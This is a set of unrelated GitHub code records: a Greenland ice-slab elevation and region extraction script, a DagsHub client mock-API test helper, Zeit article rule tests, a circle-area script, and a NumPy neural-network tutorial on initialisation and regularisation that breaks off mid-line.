#Associated the point of interest to its regional shapefile in data_iceslabs\n #New way of assigning value in the dataframe to get rid of the warning. 
This was done thanks to Peter Mortensen's reply in https://stackoverflow.com/questions/20625582/how-to-deal-with-settingwithcopywarning-in-pandas.\n if (np.sum(check_NO_rignotetal)>0):\n df_20102018_clipped_dropped.loc[i,'key_shp']='NO'\n elif (np.sum(check_NE_rignotetal)>0):\n df_20102018_clipped_dropped.loc[i,'key_shp']='NE'\n elif (np.sum(check_SE_rignotetal)>0):\n df_20102018_clipped_dropped.loc[i,'key_shp']='SE'\n elif (np.sum(check_SW_rignotetal)>0):\n df_20102018_clipped_dropped.loc[i,'key_shp']='SW'\n elif (np.sum(check_CW_rignotetal)>0):\n df_20102018_clipped_dropped.loc[i,'key_shp']='CW'\n elif (np.sum(check_NW_rignotetal)>0):\n df_20102018_clipped_dropped.loc[i,'key_shp']='NW'\n else:\n df_20102018_clipped_dropped.loc[i,'key_shp']='Out'\n \n #Add the year\n df_20102018_clipped_dropped.loc[i,'year']=int(df_20102018_clipped_dropped.loc[i,'Track_name'][0:4])\n \n #Calcul elevation\n if (np.isnan(df_20102018_clipped_dropped.loc[i,'lon_3413'])):\n continue\n \n #This is from https://gis.stackexchange.com/questions/190423/getting-pixel-values-at-single-point-using-rasterio\n for val in GrIS_DEM.sample([(df_20102018_clipped_dropped.loc[i,'lon_3413'], df_20102018_clipped_dropped.loc[i,'lat_3413'])]): \n #Calculate the corresponding elevation\n df_20102018_clipped_dropped.loc[i,'elevation']=val\n \n #Monitor the process\n if ((i % 1000)==0): #from https://stackoverflow.com/questions/13150417/python-multiple-of-10-if-statement\n print(np.round(i/df_20102018.shape[0]*100,3),'%')\n\n#Save the dictionary into a picke file\n'''\n#For RT3!\nfilename_tosave='C:/Users/jullienn/switchdrive/Private/research/RT3/export_RT1_for_RT3/df_20102018_with_elevation_for_RT3_masked_rignotetalregions'\n'''\n#filename_tosave='C:/Users/jullienn/switchdrive/Private/research/RT1/final_dataset_2002_2018/final_excel/dataset_for_Fig3/clipped/df_20102018_with_elevation_Fig3_'+csv_name+'_rignotetalregions_cleaned'#For Fig3\nfilename_tosave='C:/Users/jullienn/switchdrive/Private/research/RT1/final_dataset_2002_2018/final_excel/'+csv_name+'/clipped/df_20102018_with_elevation_'+csv_name+'_rignotetalregions_cleaned'\n\noutfile= open(filename_tosave, \"wb\" )\npickle.dump(df_20102018_clipped_dropped,outfile)\noutfile.close()\n### ----------- Extract elevation and region for 2010-2018 --------------- ###\nprint('--- Done in extract elevation ---')\n\npdb.set_trace()\n\n### ----------- Extract elevation and region for 2002-2003 --------------- ###\n#Initialise the shapefile belonging column\ndf_2002_2003['key_shp']=np.nan\ndf_2002_2003['elevation']=np.nan\ndf_2002_2003['year']=np.nan\n\n#This part of code is from 'refine_location_2017_2018.py'\n#Loop over all data point to check whether it belongs to one of the four shapefile\nfor i in range(0,len(df_2002_2003)):\n #select the point i\n single_point=Point(df_2002_2003['lon_3413'].iloc[i],df_2002_2003['lat_3413'].iloc[i])\n \n #Do the identification between the point i and the regional shapefiles\n #From: https://automating-gis-processes.github.io/CSC18/lessons/L4/point-in-polygon.html\n check_NO_rignotetal=np.asarray(NO_rignotetal.contains(single_point)).astype(int)\n check_NE_rignotetal=np.asarray(NE_rignotetal.contains(single_point)).astype(int)\n check_SE_rignotetal=np.asarray(SE_rignotetal.contains(single_point)).astype(int)\n check_SW_rignotetal=np.asarray(SW_rignotetal.contains(single_point)).astype(int)\n check_CW_rignotetal=np.asarray(CW_rignotetal.contains(single_point)).astype(int)\n check_NW_rignotetal=np.asarray(NW_rignotetal.contains(single_point)).astype(int)\n 
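 #each check_* flag is a 0/1 array marking whether the point falls in that region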
\n #Associated the point of interest to its regional shapefile in data_iceslabs\n if (np.sum(check_NO_rignotetal)>0):\n df_2002_2003['key_shp'].iloc[i]='NO'\n elif (np.sum(check_NE_rignotetal)>0):\n df_2002_2003['key_shp'].iloc[i]='NE'\n elif (np.sum(check_SE_rignotetal)>0):\n df_2002_2003['key_shp'].iloc[i]='SE'\n elif (np.sum(check_SW_rignotetal)>0):\n df_2002_2003['key_shp'].iloc[i]='SW'\n elif (np.sum(check_CW_rignotetal)>0):\n df_2002_2003['key_shp'].iloc[i]='CW'\n elif (np.sum(check_NW_rignotetal)>0):\n df_2002_2003['key_shp'].iloc[i]='NW'\n else:\n df_2002_2003['key_shp'].iloc[i]='Out'\n \n #Add the year\n if (df_2002_2003['Track_name'].iloc[i][6:8] == '02'):\n year_to_write=2002\n elif (df_2002_2003['Track_name'].iloc[i][6:8] == '03'):\n year_to_write=2003\n else:\n print('Year not known, error')\n break\n df_2002_2003['year'].iloc[i]=year_to_write\n \n #Calcul elevation\n if (np.isnan(df_2002_2003['lon_3413'].iloc[i])):\n continue\n \n #This is from https://gis.stackexchange.com/questions/190423/getting-pixel-values-at-single-point-using-rasterio\n for val in GrIS_DEM.sample([(df_2002_2003['lon_3413'].iloc[i], df_2002_2003['lat_3413'].iloc[i])]): \n #Calculate the corresponding elevation\n df_2002_2003['elevation'].iloc[i]=val\n \n #Monitor the process\n print(i/len(df_2002_2003)*100,'%')\n\n#Only work with green slabs\ndf_2002_2003_green=df_2002_2003[df_2002_2003['colorcode_icelens']==1]\n\n#Save the dictionary into a picke file\nfilename_tosave='C:/Users/jullienn/switchdrive/Private/research/RT1/final_dataset_2002_2018/df_2002_2003_with_elevation_rignotetalregions'\noutfile= open(filename_tosave, \"wb\" )\npickle.dump(df_2002_2003,outfile)\noutfile.close()","repo_name":"jullienn/changing_Greenland_iceslabs","sub_path":"src/extract_elevation.py","file_name":"extract_elevation.py","file_ext":"py","file_size_in_byte":15132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23951432269","text":"import os.path\n\nfrom httpx import Response\nfrom respx import MockRouter, Route\n\n\nclass MockApi(MockRouter):\n def __init__(self, git_repo, user=\"user\", reponame=\"repo\", *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.user = user\n self.reponame = reponame\n self.git_repo = git_repo\n\n self.storage_bucket_path = \"storage-bucket/prefix\"\n\n self._endpoints, self._responses = self._default_endpoints_and_responses()\n route_dict = {\n k: (self._endpoints[k], self._responses[k]) for k in self._endpoints\n }\n for route_name in route_dict:\n endpoint_regex, return_value = route_dict[route_name]\n self.route(name=route_name, url__regex=endpoint_regex).mock(return_value)\n\n @property\n def repourlpath(self):\n return f\"{self.user}/{self.reponame}\"\n\n @property\n def repoapipath(self):\n return f\"/api/v1/repos/{self.repourlpath}\"\n\n @property\n def repophysicalpath(self):\n return str(self.git_repo.workspace)\n\n @property\n def current_revision(self):\n heads = self.git_repo.api.heads\n if \"main\" in heads:\n return heads.main.commit.hexsha\n else:\n return heads.master.commit.hexsha\n\n def api_list_path(self, branch=None):\n if branch is None:\n branch = self.current_revision\n return f\"{self.repoapipath}/content/{branch}\"\n\n def api_raw_path(self, branch=None):\n if branch is None:\n branch = self.current_revision\n return f\"{self.repoapipath}/raw/{branch}\"\n\n @property\n def api_storage_list_path(self):\n return f\"{self.repoapipath}/storage/content/s3/{self.storage_bucket_path}\"\n\n @property\n 
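# download counterpart of api_storage_list_path above\n 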
def api_storage_raw_path(self):\n return f\"{self.repoapipath}/storage/raw/s3/{self.storage_bucket_path}\"\n\n def _default_endpoints_and_responses(self):\n endpoints = {\n \"repo\": rf\"{self.repoapipath}/?$\",\n \"branch\": rf\"{self.repoapipath}/branches/(main|master)$\",\n \"branches\": rf\"{self.repoapipath}/branches/?$\",\n \"list_root\": rf\"{self.repoapipath}/content/{self.current_revision}/$\",\n \"storages\": rf\"{self.repoapipath}/storage/?$\"\n }\n\n responses = {\n \"repo\": Response(\n 200,\n json={\n \"id\": 713,\n \"owner\": {\n \"id\": 736,\n \"login\": self.user,\n \"full_name\": self.user,\n \"avatar_url\": \"https://dagshub.com/avatars/736\",\n \"username\": self.user,\n },\n \"name\": self.reponame,\n \"full_name\": self.repourlpath,\n \"description\": \"Open Source Data Science (OSDS) Monocular Depth Estimation \"\n \"– Turn 2d photos into 3d photos – show your grandma the awesome results.\",\n \"private\": False,\n \"fork\": False,\n \"parent\": None,\n \"empty\": False,\n \"mirror\": False,\n \"size\": 19987456,\n \"html_url\": f\"https://dagshub.com/{self.repourlpath}\",\n \"clone_url\": f\"https://dagshub.com/{self.repourlpath}.git\",\n \"website\": \"\",\n \"stars_count\": 12,\n \"forks_count\": 25,\n \"watchers_count\": 5,\n \"open_issues_count\": 6,\n \"default_branch\": \"main\",\n \"created_at\": \"2020-08-02T15:19:07Z\",\n \"updated_at\": \"2023-02-01T16:06:44Z\",\n \"permissions\": {\"admin\": False, \"push\": False, \"pull\": False},\n },\n ),\n \"branch\": Response(\n 200,\n json={\n \"name\": \"main\",\n \"commit\": {\n \"id\": self.current_revision,\n \"message\": \"Update 'README.md'\\n\",\n \"url\": \"\",\n \"author\": {\n \"name\": \"dagshub\",\n \"email\": \"info@dagshub.com\",\n \"username\": \"\",\n },\n \"committer\": {\n \"name\": \"dagshub\",\n \"email\": \"info@dagshub.com\",\n \"username\": \"\",\n },\n \"added\": None,\n \"removed\": None,\n \"modified\": None,\n \"timestamp\": \"2021-08-10T09:03:32Z\",\n },\n },\n ),\n \"branches\": Response(\n 200,\n json=[\n {\n \"name\": \"main\",\n \"commit\": {\n \"id\": self.current_revision,\n \"message\": \"Update 'README.md'\\n\",\n \"url\": \"\",\n \"author\": {\n \"name\": \"dagshub\",\n \"email\": \"info@dagshub.com\",\n \"username\": \"\",\n },\n \"committer\": {\n \"name\": \"dagshub\",\n \"email\": \"info@dagshub.com\",\n \"username\": \"\",\n },\n \"added\": None,\n \"removed\": None,\n \"modified\": None,\n \"timestamp\": \"2021-08-10T09:03:32Z\",\n },\n }\n ],\n ),\n \"list_root\": Response(\n 200,\n json=[\n {\n \"path\": \"a.txt\",\n \"type\": \"file\",\n \"size\": 0,\n \"hash\": \"some_hash\",\n \"versioning\": \"dvc\",\n \"download_url\": \"some_url\",\n \"content_url\": \"some_url\",\n },\n {\n \"path\": \"b.txt\",\n \"type\": \"file\",\n \"size\": 0,\n \"hash\": \"some_hash\",\n \"versioning\": \"dvc\",\n \"download_url\": \"some_url\",\n \"content_url\": \"some_url\",\n },\n {\n \"path\": \"c.txt\",\n \"type\": \"file\",\n \"size\": 0,\n \"hash\": \"some_hash\",\n \"versioning\": \"dvc\",\n \"download_url\": \"some_url\",\n \"content_url\": \"some_url\",\n },\n {\n \"path\": \"a.txt.dvc\",\n \"type\": \"file\",\n \"size\": 0,\n \"hash\": \"some_hash\",\n \"versioning\": \"git\",\n \"download_url\": \"some_url\",\n \"content_url\": \"some_url\",\n },\n ],\n ),\n \"storages\": Response(\n 200,\n json=[\n {\n \"name\": self.storage_bucket_path,\n \"protocol\": \"s3\",\n \"list_path\": f\"{self.repoapipath}/storage/content/s3/{self.storage_bucket_path}\"\n }\n ]\n )\n }\n\n return 
endpoints, responses\n\n def add_file(self, path, content=\"aaa\", status=200, is_storage=False, revision=None) -> Route:\n \"\"\"\n Add a file to the api (only accessible via the raw endpoint)\n \"\"\"\n\n # TODO: add branch\n if is_storage:\n route = self.route(url=f\"{self.api_storage_raw_path}/{path}\")\n else:\n route = self.route(url=f\"{self.api_raw_path(revision)}/{path}\")\n route.mock(Response(status, content=content))\n return route\n\n def add_dir(self, path, contents=[], status=200, is_storage=False, revision=None) -> Route:\n \"\"\"\n Add a directory to the api (only accessible via the content endpoint)\n We don't keep a tree of added dirs, so it's not dynamic\n \"\"\"\n\n # TODO: add branch\n if is_storage:\n route = self.route(url=f\"{self.api_storage_list_path}/{path}\")\n else:\n route = self.route(url=f\"{self.api_list_path(revision)}/{path}\")\n content = [\n self.generate_list_entry(os.path.join(path, c[0]), c[1]) for c in contents\n ]\n route.mock(Response(status, json=content))\n return route\n\n def add_storage_dir(self, path, contents=[], from_token=None, next_token=None, status=200):\n \"\"\"\n Add a directory to the storage api\n Storage has a different response schema\n \"\"\"\n url = f\"{self.api_storage_list_path}/{path}?paging=true\"\n if from_token is not None:\n url += f\"&from_token={from_token}\"\n route = self.route(url=url)\n content = {\n \"entries\": [\n self.generate_list_entry(os.path.join(path, c[0]), c[1]) for c in contents\n ],\n \"limit\": len(contents),\n }\n if next_token is not None:\n content[\"next_token\"] = next_token\n route.mock(Response(status, json=content))\n return route\n\n def enable_uploads(self, branch=\"main\"):\n route = self.put(\n name=\"upload\", url__regex=f\"api/v1/repos/{self.repourlpath}/content/{branch}/.*\"\n )\n route.mock(Response(200))\n return route\n\n def generate_list_entry(self, path, entry_type=\"file\"):\n return {\n \"path\": path,\n \"type\": entry_type,\n \"size\": 0,\n \"hash\": \"8586da76f372efa83d832a9d0e664817.dir\",\n \"versioning\": \"dvc\",\n \"download_url\": f\"https://dagshub.com/{self.repourlpath}/raw/{self.current_revision}/{path}\",\n \"content_url\": f\"https://dagshub.com/{self.repourlpath}/content/{self.current_revision}/{path}\",\n }\n\n def add_branch(self, branch, revision):\n resp_json = {\n \"name\": branch,\n \"commit\": {\n \"id\": revision,\n \"message\": \"Update 'README.md'\\n\",\n \"url\": \"\",\n \"author\": {\n \"name\": \"dagshub\",\n \"email\": \"info@dagshub.com\",\n \"username\": \"\",\n },\n \"committer\": {\n \"name\": \"dagshub\",\n \"email\": \"info@dagshub.com\",\n \"username\": \"\",\n },\n \"added\": None,\n \"removed\": None,\n \"modified\": None,\n \"timestamp\": \"2021-08-10T09:03:32Z\",\n }\n }\n branch_route = self.get(url=f\"/api/v1/repos/{self.repourlpath}/branches/{branch}\")\n branch_route.mock(Response(200, json=resp_json))\n return branch_route\n\n def add_commit(self, revision):\n resp_json = {\n \"commit\": {\n \"id\": revision,\n \"message\": \"Update 'README.md'\\n\",\n \"url\": \"\",\n \"author\": {\n \"name\": \"dagshub\",\n \"email\": \"info@dagshub.com\",\n \"username\": \"\",\n },\n \"committer\": {\n \"name\": \"dagshub\",\n \"email\": \"info@dagshub.com\",\n \"username\": \"\",\n },\n \"added\": None,\n \"removed\": None,\n \"modified\": None,\n \"timestamp\": \"2021-08-10T09:03:32Z\",\n }\n }\n branch_route = self.get(url=f\"/api/v1/repos/{self.repourlpath}/commits/{revision}\")\n branch_route.mock(Response(200, json=resp_json))\n return 
branch_route\n","repo_name":"DagsHub/client","sub_path":"tests/dda/mock_api.py","file_name":"mock_api.py","file_ext":"py","file_size_in_byte":12238,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"19"} +{"seq_id":"41520596899","text":"from zeit.edit.rule import Rule\nimport zeit.cms.interfaces\nimport zeit.content.article.testing\nimport zeit.edit.interfaces\nimport zope.security.proxy\n\n\nclass RuleTest(zeit.content.article.testing.FunctionalTestCase):\n def test_article_glob_should_apply_to_block(self):\n block = self.get_factory(self.get_article(), 'p')()\n r = Rule(\n \"\"\"\napplicable(article)\nerror_if(True, 'foo')\n\"\"\"\n )\n s = r.apply(block, zeit.edit.interfaces.IRuleGlobs(block))\n self.assertEqual(zeit.edit.rule.ERROR, s.status)\n\n def test_IReference_content_returns_referenced_object(self):\n self.repository['info'] = zeit.content.infobox.infobox.Infobox()\n block = self.get_factory(self.get_article(), 'infobox')()\n block.references = self.repository['info']\n block = zope.security.proxy.ProxyFactory(block)\n r = Rule(\n \"\"\"\nfrom zeit.content.infobox.interfaces import IInfobox\napplicable(True)\nerror_if(IInfobox.providedBy(content[0]), 'foo')\n\"\"\"\n )\n s = r.apply(block, zeit.edit.interfaces.IRuleGlobs(block))\n self.assertEqual(zeit.edit.rule.ERROR, s.status)\n\n def test_IImage_content_returns_referenced_object(self):\n block = self.get_factory(self.get_article(), 'image')()\n image = 'http://xml.zeit.de/2006/DSC00109_2.JPG'\n block.references = block.references.create(zeit.cms.interfaces.ICMSContent(image))\n r = Rule(\n \"\"\"\nfrom zeit.content.image.interfaces import IImage\napplicable(True)\nerror_if(IImage.providedBy(content[0]), 'foo')\n\"\"\"\n )\n s = r.apply(block, zeit.edit.interfaces.IRuleGlobs(block))\n self.assertEqual(zeit.edit.rule.ERROR, s.status)\n\n def test_IVolume_content_returns_referenced_object(self):\n from zeit.content.volume.volume import Volume\n\n volume = Volume()\n volume.year = 2015\n volume.volume = 1\n volume.product = zeit.cms.content.sources.Product('ZEI')\n zeit.cms.content.add.find_or_create_folder('2015', '01')\n self.repository['2015']['01']['ausgabe'] = volume\n block = self.get_factory(self.get_article(), 'volume')()\n block.references = block.references.create(volume)\n r = Rule(\n \"\"\"\nfrom zeit.content.volume.interfaces import IVolume\napplicable(True)\nerror_if(IVolume.providedBy(content[0]), 'bar')\n\"\"\"\n )\n s = r.apply(block, zeit.edit.interfaces.IRuleGlobs(block))\n self.assertEqual(zeit.edit.rule.ERROR, s.status)\n","repo_name":"ZeitOnline/vivi","sub_path":"core/src/zeit/content/article/edit/tests/test_rule.py","file_name":"test_rule.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"33290114182","text":"from math import pi \n\ndef circle_area(r):\n    \"\"\"Return the area of the circle for the given radius.\"\"\"\n    return pi * r**2\n\nraw_r = input(\"Please give me the radius of the circle:\")\ntest_list = raw_r.split('.')\ntry:\n    r = float(raw_r)\n    area = circle_area(r)\n    print(f\"The area of a circle with radius {r} is {round(area, 2)}\")\nexcept ValueError:\n    print(\"Something went wrong!\")","repo_name":"jgrynczewski/sredzaw","sub_path":"3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3177802194","text":"\nimport numpy as np\nimport matplotlib.pyplot 
as plt\nimport sklearn\nimport sklearn.datasets\nimport scipy.io\n\n#激活函数\ndef sigmoid(x):\n s = 1/(1+np.exp(-x))\n return s\n\ndef relu(x):\n s = np.maximum(0,x)\n return s\n\n#初始化数据集\ndef load_dataset():\n np.random.seed(1)\n train_X, train_Y = sklearn.datasets.make_circles(n_samples=300, noise=.05)\n np.random.seed(2)\n test_X, test_Y = sklearn.datasets.make_circles(n_samples=100, noise=.05)\n # Visualize the data\n plt.scatter(train_X[:, 0], train_X[:, 1], c=train_Y, s=40, cmap=plt.cm.Spectral);\n train_X = train_X.T\n train_Y = train_Y.reshape((1, train_Y.shape[0]))\n test_X = test_X.T\n test_Y = test_Y.reshape((1, test_Y.shape[0]))\n return train_X, train_Y, test_X, test_Y\n\ndef load_2D_dataset():\n data = scipy.io.loadmat('data.mat')\n train_X = data['X'].T\n train_Y = data['y'].T\n test_X = data['Xval'].T\n test_Y = data['yval'].T\n\n plt.scatter(train_X[0, :], train_X[1, :], c=train_Y, s=40, cmap=plt.cm.Spectral);\n \n return train_X, train_Y, test_X, test_Y\n\n#画出分界\ndef plot_decision_boundary(model, X, y):\n # Set min and max values and give it some padding\n x_min, x_max = X[0, :].min() - 1, X[0, :].max() + 1\n y_min, y_max = X[1, :].min() - 1, X[1, :].max() + 1\n h = 0.01\n # Generate a grid of points with distance h between them\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))\n # Predict the function value for the whole grid\n Z = model(np.c_[xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n # Plot the contour and training examples\n plt.contourf(xx, yy, Z, cmap=plt.cm.Spectral)\n plt.ylabel('x2')\n plt.xlabel('x1')\n plt.scatter(X[0, :], X[1, :], c=y, cmap=plt.cm.Spectral)\n plt.show()\n \ndef predict_dec(parameters, X):\n \n a3, cache = forward_propagation(X, parameters)\n predictions = (a3>0.5)\n \n return predictions\n\n#前向传播\ndef forward_propagation(X, parameters):\n\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n W3 = parameters[\"W3\"]\n b3 = parameters[\"b3\"]\n \n # LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID\n z1 = np.dot(W1, X) + b1\n a1 = relu(z1)\n z2 = np.dot(W2, a1) + b2\n a2 = relu(z2)\n z3 = np.dot(W3, a2) + b3\n a3 = sigmoid(z3)\n \n cache = (z1, a1, W1, b1, z2, a2, W2, b2, z3, a3, W3, b3)\n \n return a3, cache\n\n#反向传播\ndef backward_propagation(X, Y, cache):\n \n m = X.shape[1]\n (z1, a1, W1, b1, z2, a2, W2, b2, z3, a3, W3, b3) = cache\n \n dz3 = 1./m * (a3 - Y)\n dW3 = np.dot(dz3, a2.T)\n db3 = np.sum(dz3, axis=1, keepdims = True)\n \n da2 = np.dot(W3.T, dz3)\n dz2 = np.multiply(da2, np.int64(a2 > 0))\n dW2 = np.dot(dz2, a1.T)\n db2 = np.sum(dz2, axis=1, keepdims = True)\n \n da1 = np.dot(W2.T, dz2)\n dz1 = np.multiply(da1, np.int64(a1 > 0))\n dW1 = np.dot(dz1, X.T)\n db1 = np.sum(dz1, axis=1, keepdims = True)\n \n gradients = {\"dz3\": dz3, \"dW3\": dW3, \"db3\": db3,\n \"da2\": da2, \"dz2\": dz2, \"dW2\": dW2, \"db2\": db2,\n \"da1\": da1, \"dz1\": dz1, \"dW1\": dW1, \"db1\": db1}\n \n return gradients\n\n#计算成本\ndef compute_cost(a3, Y):\n \n m = Y.shape[1]\n logprobs = np.multiply(-np.log(a3),Y) + np.multiply(-np.log(1 - a3), 1 - Y)\n loss = 1./m * np.nansum(logprobs)\n \n return loss\n\n#更新参数\ndef update_parameters(parameters, grads, learning_rate):\n \n n = len(parameters) // 2 \n for k in range(n):\n parameters[\"W\" + str(k+1)] = parameters[\"W\" + str(k+1)] - learning_rate * grads[\"dW\" + str(k+1)]\n parameters[\"b\" + str(k+1)] = parameters[\"b\" + str(k+1)] - learning_rate * grads[\"db\" + str(k+1)]\n \n return parameters\n\n#预测结果\ndef 
predict(X, y, parameters):\n\n    m = X.shape[1]\n    p = np.zeros((1,m), dtype = int)\n    \n    a3, caches = forward_propagation(X, parameters)\n\n    for i in range(0, a3.shape[1]):\n        if a3[0,i] > 0.5:\n            p[0,i] = 1\n        else:\n            p[0,i] = 0\n    print(\"识别准确度: \"  + str(np.mean((p[0,:] == y[0,:]))))\n    \n    return p\n\n#建立整个模型\ndef model(X, Y, learning_rate = 0.01, layers_dims = [], num_iterations = 15000, initialization = \"he\", lambd = 0, keep_prob = 1, print_cost = True):\n    \n    grads = {}\n    costs = [] \n    m = X.shape[1] \n    \n    #三种参数初始化\n    if initialization == \"zeros\":\n        parameters = initialize_parameters_zeros(layers_dims)\n    elif initialization == \"random\":\n        parameters = initialize_parameters_random(layers_dims)\n    elif initialization == \"he\":\n        parameters = initialize_parameters_he(layers_dims)\n    \n    for i in range(0, num_iterations):\n\n        # 前向传播: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID.\n        if keep_prob == 1:\n            a3, cache = forward_propagation(X, parameters)\n        elif keep_prob < 1:\n            a3, cache = forward_propagation_with_dropout(X, parameters, keep_prob)\n        \n        # 损失函数\n        if lambd == 0:\n            cost = compute_cost(a3, Y)\n        else:\n            cost = compute_cost_with_regularization(a3, Y, parameters, lambd)\n        \n        if lambd == 0 and keep_prob == 1:\n            grads = backward_propagation(X, Y, cache)\n        elif lambd != 0:\n            grads = backward_propagation_with_regularization(X, Y, cache, lambd) #L2正则化\n        elif keep_prob < 1:\n            grads = backward_propagation_with_dropout(X, Y, cache, keep_prob) #DropOut正则化\n        \n        #更新参数    \n        parameters = update_parameters(parameters, grads, learning_rate)\n        \n        if print_cost and i % 3000 == 0:\n            print(\"循环{}次后的成本值: {}\".format(i, cost))\n        if print_cost and i % 1000 == 0:\n            costs.append(cost)\n    \n    #画出成本曲线\n    plt.plot(costs)\n    plt.ylabel('cost')\n    plt.xlabel('iterations (x1,000)')\n    plt.title(\"Learning rate =\" + str(learning_rate))\n    plt.show()\n    \n    return parameters\n\n#参数w,b初始化为0\ndef initialize_parameters_zeros(layers_dims):\n    \n    parameters = {}\n    L = len(layers_dims) \n    \n    for l in range(1, L):\n        parameters['W' + str(l)] = np.zeros((layers_dims[l],layers_dims[l-1]))\n        parameters['b' + str(l)] = np.zeros((layers_dims[l],1))\n    return parameters\n\n#参数w初始化为random\ndef initialize_parameters_random(layers_dims):\n    \n    np.random.seed(3) \n    parameters = {}\n    L = len(layers_dims) \n    \n    for l in range(1, L):\n        parameters['W' + str(l)] = np.random.randn(layers_dims[l],layers_dims[l-1]) * 10\n        parameters['b' + str(l)] = np.zeros((layers_dims[l],1))\n    return parameters\n    \n#参数w进行Xavier初始化\ndef initialize_parameters_he(layers_dims):\n    \n    np.random.seed(3)\n    parameters = {}\n    L = len(layers_dims) - 1\n    \n    for l in range(1, L + 1):\n        parameters['W' + str(l)] = np.random.randn(layers_dims[l],layers_dims[l-1]) * np.sqrt(1.0/(layers_dims[l-1]))\n        parameters['b' + str(l)] = np.zeros((layers_dims[l],1))\n    return parameters\n\n#L2正则化下损失计算\ndef compute_cost_with_regularization(A3, Y, parameters, lambd):\n    m = Y.shape[1]\n    W1 = parameters[\"W1\"]\n    W2 = parameters[\"W2\"]\n    W3 = parameters[\"W3\"]\n    \n    cross_entropy_cost = compute_cost(A3, Y)\n    L2_regularization_cost = lambd*(np.sum(np.square(W1))+np.sum(np.square(W2))+np.sum(np.square(W3)))/(2*m) #L2正则化项\n    cost = cross_entropy_cost + L2_regularization_cost\n    \n    return cost\n\n#L2正则化下反向传播\ndef backward_propagation_with_regularization(X, Y, cache, lambd):\n    \n    m = X.shape[1]\n    (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3) = cache\n    \n    dZ3 = A3 - Y\n    \n    dW3 = 1./m * np.dot(dZ3, A2.T) + lambd*W3/m\n    db3 = 1./m * np.sum(dZ3, axis=1, keepdims = True)\n    \n    dA2 = np.dot(W3.T, dZ3)\n    dZ2 
= np.multiply(dA2, np.int64(A2 > 0))\n dW2 = 1./m * np.dot(dZ2, A1.T) + lambd*W2/m\n db2 = 1./m * np.sum(dZ2, axis=1, keepdims = True)\n \n dA1 = np.dot(W2.T, dZ2)\n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n dW1 = 1./m * np.dot(dZ1, X.T) + lambd*W1/m\n db1 = 1./m * np.sum(dZ1, axis=1, keepdims = True)\n \n gradients = {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3,\"dA2\": dA2,\n \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2, \"dA1\": dA1, \n \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n \n return gradients\n\n#DropOut正则化下前向传播\ndef forward_propagation_with_dropout(X, parameters, keep_prob = 0.5):\n\n np.random.seed(1)\n \n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n W3 = parameters[\"W3\"]\n b3 = parameters[\"b3\"]\n \n # LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID\n Z1 = np.dot(W1, X) + b1\n A1 = relu(Z1)\n D1 = np.random.rand(A1.shape[0],A1.shape[1]) \n D1 = D1 < keep_prob \n A1 = np.multiply(A1,D1) \n A1 = A1 / keep_prob \n \n Z2 = np.dot(W2, A1) + b2\n A2 = relu(Z2)\n D2 = np.random.rand(A2.shape[0],A2.shape[1]) \n D2 = D2 < keep_prob \n A2 = np.multiply(A2,D2) \n A2 = A2 / keep_prob \n\n Z3 = np.dot(W3, A2) + b3\n A3 = sigmoid(Z3)\n \n cache = (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3)\n \n return A3, cache\n\n#DropOut正则化下反向传播\ndef backward_propagation_with_dropout(X, Y, cache, keep_prob):\n \n m = X.shape[1]\n (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3) = cache\n \n dZ3 = A3 - Y\n dW3 = 1./m * np.dot(dZ3, A2.T)\n db3 = 1./m * np.sum(dZ3, axis=1, keepdims = True)\n \n dA2 = np.dot(W3.T, dZ3)\n dA2 = np.multiply(dA2,D2) \n dA2 = dA2 / keep_prob \n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n dW2 = 1./m * np.dot(dZ2, A1.T)\n db2 = 1./m * np.sum(dZ2, axis=1, keepdims = True)\n \n dA1 = np.dot(W2.T, dZ2)\n dA1 = np.multiply(dA1,D1) \n dA1 = dA1 / keep_prob \n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n dW1 = 1./m * np.dot(dZ1, X.T)\n db1 = 1./m * np.sum(dZ1, axis=1, keepdims = True)\n \n gradients = {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3,\"dA2\": dA2,\n \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2, \"dA1\": dA1, \n \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n \n return gradients\n\n#梯度检验转换\ndef dictionary_to_vector(parameters):\n keys = []\n count = 0\n for key in [\"W1\", \"b1\", \"W2\", \"b2\", \"W3\", \"b3\"]:\n \n # flatten parameter\n new_vector = np.reshape(parameters[key], (-1,1))\n keys = keys + [key]*new_vector.shape[0]\n \n if count == 0:\n theta = new_vector\n else:\n theta = np.concatenate((theta, new_vector), axis=0)\n count = count + 1\n\n return theta, keys\n\ndef vector_to_dictionary(theta):\n\n parameters = {}\n parameters[\"W1\"] = theta[:20].reshape((5,4))\n parameters[\"b1\"] = theta[20:25].reshape((5,1))\n parameters[\"W2\"] = theta[25:40].reshape((3,5))\n parameters[\"b2\"] = theta[40:43].reshape((3,1))\n parameters[\"W3\"] = theta[43:46].reshape((1,3))\n parameters[\"b3\"] = 